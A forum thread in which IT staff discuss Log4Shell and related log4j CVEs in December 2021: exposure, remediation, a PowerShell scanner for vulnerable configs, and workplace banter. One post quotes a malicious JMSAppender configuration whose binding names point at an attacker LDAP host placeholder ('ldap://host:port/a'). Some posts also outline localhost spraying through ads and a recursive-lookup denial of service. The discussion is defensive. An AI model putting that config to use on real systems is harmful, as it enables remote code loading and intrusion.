Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.

Potato Salad
Oct 23, 2014

nobody cares

mllaneza posted:

There is no :stare: big enough, that's an amazing hack.

I'm an overflow !
I can write to arbitrary memory !
All I can execute is AND, OR, XOR and XNOR
I'm Turing complete !

VHDL PDFs

Adbot
ADBOT LOVES YOU

some kinda jackal
Feb 25, 2003

Laughing at our HR blasting out “get ready for the holidays, today is a surprise half day, enjoy everyone!!” to the entire company while half of it is going to continue working through the weekend

KillHour
Oct 28, 2007

Martytoof posted:

Laughing at our HR blasting out “get ready for the holidays, today is a surprise half day, enjoy everyone!!” to the entire company while half of it is going to continue working through the weekend

Just forward it to your boss with the message "I'm turning my phone off"

BaseballPCHiker
Jan 16, 2006

Martytoof posted:

Yup...

My boss now wants us to scan every desktop in the environment for any potential apps running log4j. I've tried to explain that if the attacker is actually able to get onto a desktop and input malicious code to an app running on the desktop than its already game over.

Not saying its not worthwhile to document these apps and to work on getting them patched as necessary, just that it shouldnt be a work over the weekend priority. I am tired.

rafikki
Mar 8, 2008

I see what you did there. (It's pretty easy, since ducks have a field of vision spanning 340 degrees.)

~SMcD

Anyone seen much about this? https://www.blumira.com/analysis-log4shell-local-trigger/

text editor
Jan 8, 2007

Martytoof posted:

is surprise half day code for 'a bunch of people sent us positive civic tests and we don't wanna admit it so we'll send you home and hope it doesn't spread'?

KillHour
Oct 28, 2007

text editor posted:

is surprise half day code for 'a bunch of people sent us positive civic tests and we don't wanna admit it so we'll send you home and hope it doesn't spread'?

Once you test positive for Civic you're stuck with it for at least 250k miles :ohdear:

BaseballPCHiker
Jan 16, 2006

This still reads like a user needs to get directed to a malicious site AND have software running a vulnerable version of log4j. So it definitely sucks a bunch, but isnt quite the all week waking nightmare that this week has been.

BaseballPCHiker fucked around with this message at 21:26 on Dec 17, 2021

rafikki
Mar 8, 2008

I see what you did there. (It's pretty easy, since ducks have a field of vision spanning 340 degrees.)

~SMcD

Right? That seems like kind of a big deal and I haven't seen chatter about it in my usual haunts.

BaseballPCHiker
Jan 16, 2006

Ah my edit came in after your quote.

BaseballPCHiker posted:

This still reads like a user needs to get directed to a malicious site AND have software running a vulnerable version of log4j. So it definitely sucks a bunch, but isnt quite the all week waking nightmare that this week has been.

rafikki
Mar 8, 2008

~SMcD

BaseballPCHiker posted:

Ah my edit came in after your quote.

Oh, yeah but still I wonder about things like advertising networks and their code being spread all over the internet.

astral
Apr 26, 2004

It's a good thing users never click phishing links.

Nukelear v.2
Jun 25, 2004
My optional title text

BaseballPCHiker posted:

Yup...

My boss now wants us to scan every desktop in the environment for any potential apps running log4j. I've tried to explain that if the attacker is actually able to get onto a desktop and input malicious code to an app running on the desktop than its already game over.

Not saying its not worthwhile to document these apps and to work on getting them patched as necessary, just that it shouldnt be a work over the weekend priority. I am tired.

If you're a Defender shop, they just added Log4j support. We found one hit in our environment.

Fart Amplifier
Apr 12, 2003

BaseballPCHiker posted:

Yup...

Having a RCE vector on your machine is something that should be closed ASAP

spankmeister
Jun 15, 2008

BaseballPCHiker posted:

Yup...

This is wrong, actually. Inputting malicious code could be as simple as sending an email with an attachment that has the jndi string in a metadata field of a file that gets opened by the user.
You don't have to be able to already be executing some kind of code, or be able to send arbitrary network messages. It really depends on the application what the attack surface really is.

fake edit: i had part of the log4j string in my post, and cloudflare blocked it, lol

Impotence
Nov 8, 2010
Lipstick Apathy

BaseballPCHiker posted:

if a user has something like dev work on a java app or a vulnerable thing running on localhost: yes you can spray requests containing the jndi string to localhost:everyport. there are already malicious ads that load this type of script.

there is a ublock origin filterlist that is under 'privacy' for blocking localhost access from third party origins.

fwiw: this type of sweep against localhost is actually used actively by many major sites as part of trying to stop scrapers and break anonymity, lol

BaseballPCHiker
Jan 16, 2006

Fart Amplifier posted:

Having a RCE vector on your machine is something that should be closed ASAP

I agree. I just don't want to work over the weekend and I don't think it's as bad as log4j on some web facing server.

spankmeister posted:

This is wrong, actually. Inputting malicious code could be as simple as sending an email with an attachment that has the jndi string in a metadata field of a file that gets opened by the user.

I will admit that my 4 month old has kept me up all week and that I may not be firing on all cylinders but are we talking about the same webhooks exploit? My read was that a user would have to be directed to a malicious site and be running a vulnerable version of log4j.

Biowarfare posted:

if a user has something like dev work on a java app or a vulnerable thing running on localhost: yes you can spray requests containing the jndi string to localhost:everyport. there are already malicious ads that load this type of script.

there is a ublock origin filterlist that is under 'privacy' for blocking localhost access from third party origins.

fwiw: this type of sweep against localhost is actually used actively by many major sites as part of trying to stop scrapers and break anonymity, lol

Ok but again they need to be directed to a site containing malicious code though right?

I think I need to just take a break and get a nap in.

Jabor
Jul 16, 2010

#1 Loser at SpaceChem
If you go to a website that's showing a punch the monkey ad, even if you never click on the ad, you're running code from the site that created and placed the ad.

If you're wanting to block access to sites that could run malicious code, you're talking about blocking just about the entire internet because all of them run ads and most of them aren't exactly selective about where they get them from

Rust Martialis
May 8, 2007
So for log4j v1, the "solution" is to "audit your log4j.properties or log4j.xml files" to make sure JMSAppender isn't configured insecurely.

Should be easy enough to run a script to find and search log4j config files for JMSAppender config lines.... anyone got a script or do I need to try my pathetic PowerShell script skills.

Cup Runneth Over
Aug 8, 2009

She said life's
Too short to worry
Life's too long to wait
It's too short
Not to love everybody
Life's too long to hate

Jabor posted:

If you're wanting to block access to sites that could run malicious code, you're talking about blocking just about [...] all [...] ads

Way ahead of you :)

Impotence
Nov 8, 2010
Lipstick Apathy
is there going to be a 2.18 before christmas

Rust Martialis
May 8, 2007
CVE-2021-4104 - reading the CVE at https://access.redhat.com/security/cve/CVE-2021-4104 and the bugzilla page https://bugzilla.redhat.com/show_bug.cgi?id=2031667 , it reads to me like version 1 is not really a remote exploit at all?

A commenter on bugzilla points out it requires that JMSAppnder be enabled in log4j.config, but also that remote exploits require that additional settings in the file be set locally to point to an attacker's site:
pre:
"you can execute a command only by putting it in the properties TopicBindingName or TopicConnectionFactoryBindingName. For example:

log4j.appender.jms=org.apache.log4j.net.JMSAppender

log4j.appender.jms.InitialContextFactoryName=org.apache.activemq.jndi.ActiveMQInitialContextFactory

log4j.appender.jms.ProviderURL=tcp://localhost:61616

>>>log4j.appender.jms.TopicBindingName=ldap://host:port/a

>>>log4j.appender.jms.TopicConnectionFactoryBindingName=ldap://host:port/a"
If I've read this correctly, a script (PowerShell or UNIX shell) should be able to search a target system for log4j.config and log4j.xml files and spit out the values for log4j.appender.jms, and also the values of TopicBindingName and TopicConnectionFactoryBindingName.

Lastly the script should make the config file read-only by *anyone* including the application.

I'm sure someone's already figured this out a long time ago but I am home with a sore arm since I got my booster yesterday.

Does this hold together? Did I gently caress up somewhere?

Esran
Apr 28, 2008
The issue at https://issues.apache.org/jira/browse/LOG4J2-3230 now has a CVE (CVE-2021-45105).

From the log4j security page:

quote:

Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process. This is also known as a DOS (Denial of Service) attack.

Probably a good idea to upgrade, again. Unless you are using context lookups, it can probably wait until regular business hours though.

Esran fucked around with this message at 22:32 on Dec 18, 2021

some kinda jackal
Feb 25, 2003

I'm so tired of this and even more tired of trying to learn enough java to parse our java codebase to understand if we're using context lookups to understand the actual applicability of this.

Esran
Apr 28, 2008
I think it's referring to the first item on this page https://logging.apache.org/log4j/2.x/manual/lookups.html

So you might be able to just scan your log4j2 config for "ctx". Hopefully you don't have to read too much of your Java codebase to find the logging config.

some kinda jackal
Feb 25, 2003

Thanks! I have our devs on a new bridge checking.

I think of everything, I'm tired of being the bad guy slash messenger here.

Bob Morales
Aug 18, 2006

Just wear the fucking mask, Bob

I don't care how many people I probably infected with COVID-19 while refusing to wear a mask, my comfort is far more important than the health and safety of everyone around me!

Does deleting the jndi class file not cause an error/crash when the function is called?

Achmed Jones
Oct 16, 2004

Bob Morales posted:

Does deleting the jndi class file not cause an error/crash when the function is called?

in general you can expect that no, given that it is remediation advice

in specific, i expect that transformers are all loaded and then run on each input string. if the class for making jndi strings do stupid poo poo doesn't load, that means the strings don't do stupid poo poo. remember how this works: nobody's calling "look up external poo poo to load please." they're just logging a string, and that string is searched for format strings to be replaced recursively. one of those format strings is the problematic jndi type. since no variable is provided for interpolation for this type of transformer, there's no change in number of arguments either

the above could be 100% wrong, but that's what i've gathered from generally knowing how this sort of software works. i don't know that it _actually_ works this way though

KillHour
Oct 28, 2007

Achmed Jones posted:

and that string is searched for format strings to be replaced recursively.

This is the problem right here and it blows my mind nobody thought this was a terrible idea.

Saukkis
May 16, 2003

Unless I'm on the inside curve pointing straight at oncoming traffic the high beams stay on and I laugh at your puny protest flashes.
I am Most Important Man. Most Important Man in the World.

Bob Morales posted:

Based on these it sounds non-issue.

https://github.com/apache/logging-log4j2/pull/608#issuecomment-990305306
https://github.com/apache/logging-log4j2/commit/3203d3eab6bdd12fdad7ded1860db16a89468c3f

Rust Martialis
May 8, 2007
lovely Log4j v1 scanner

pre:
$Drives = Get-PSDrive -PSProvider 'FileSystem'

foreach($Drive in $drives) {
		gci -Path $Drive.root -rec -force -include log4j.config,log4j.xml -ea 0 | foreach {select-string "log4j.appender.jms" $_} | select-object -Property Path, LineNumber, Line | ft -HideTableHeaders
}
Looks on all drives for and prints out the values on any line in a log4j.config or log4j.xml file with the log4j.appender.jms string in it: full path, line in file, value found.

pre:
N:\log4j.config          1 log4j.appender.jms=org.apache.log4j.net.JMSAppender
N:\log4j.config          2 log4j.appender.jms.InitialContextFactoryName=org.apache.activemq.jndi.ActiveMQInitialCont...
N:\log4j.config          3 log4j.appender.jms.ProviderURL=tcp://localhost:61616
N:\log4j.config          4 log4j.appender.jms.TopicBindingName=ldap://host:port/a
N:\log4j.config          5 log4j.appender.jms.TopicConnectionFactoryBindingName=ldap://host:port/a
Of course some app coders probably hide their log4j config statements in some other loving file. You could just wildcard the *.config and *.xml

Rust Martialis fucked around with this message at 21:00 on Dec 19, 2021

Rust Martialis
May 8, 2007
We ran the script that peeks inside jar files for JNDILookup.class and yeah, some apps repackage class files. Thought you could just look for log4j-core-2.x.jar? Nope!

pre:
C:\Program Files\Commvault\ContentStore\Base\DbJars\DbArchiveEngine.jar
C:\Program Files\Hewlett-Packard\CSArobocopy\Tools\lib\CLI-lib.jar
D:\apps\elk\7.4.0\logstash\vendor\bundle\jruby\2.5.0\gems\logstash-input-tcp-6.0.3-java\vendor\jar-dependencies\org\logstash\inputs\logstash-input-tcp\6.0.3\logstash-input-tcp-6.0.3.jar
Also a bunch of software I can't post because it might identify the customers affected.

single-mode fiber
Dec 30, 2012

Amusingly enough, a Palo Alto with a threat prevention license and running decryption will prevent this page of this thread from loading, just off the example snippets present.

Rust Martialis
May 8, 2007
The myriad ways of obfuscating the attack would get past your ngFW but would also be unreadable

RFC2324
Jun 7, 2012

http 418

Rust Martialis posted:

The myriad ways of obfuscating the attack would get past your ngFW but would also be unreadable

But enough about my posts

evil_bunnY
Apr 2, 2003

Martytoof posted:

It's so the other half leaves the working half in peace

Rust Martialis posted:

We ran the script that peeks inside jar files for JNDILookup.class and yeah, some apps repackage class files. Thought you could just look for log4j-core-2.x.jar? Nope!
I told the fuckheads in charge of managing this dumpster fire twice to look at all jar files instead of building an app inventory but did they listen?

evil_bunnY fucked around with this message at 00:49 on Dec 20, 2021

some kinda jackal
Feb 25, 2003

I’m still trying to understand how I am somehow at the centre of our incident response despite not being remotely involved in secops or incident response in like three years.

I mean I’m happy to pitch in and I’ve got extensive historical info on this place, but I guess a lot more handoff needs to happen.

Absurd Alhazred
Mar 27, 2010

by Athanatos

Martytoof posted:

I’m still trying to understand how I am somehow at the centre of our incident response despite not being remotely involved in secops or incident response in like three years.

Everybody else said "not it!" first. :shrug:

some kinda jackal
Feb 25, 2003

Absurd Alhazred posted:

Everybody else said "not it!" first. :shrug:

I have a lot of things I can’t say due to NDA but this one gets a lol out of me

Adbot
ADBOT LOVES YOU

Absurd Alhazred
Mar 27, 2010

by Athanatos

Martytoof posted:

I have a lot of things I can’t say due to NDA but this one gets a lol out of me

Glad I could bring a shred of levity to what I'm sure is a stressful time!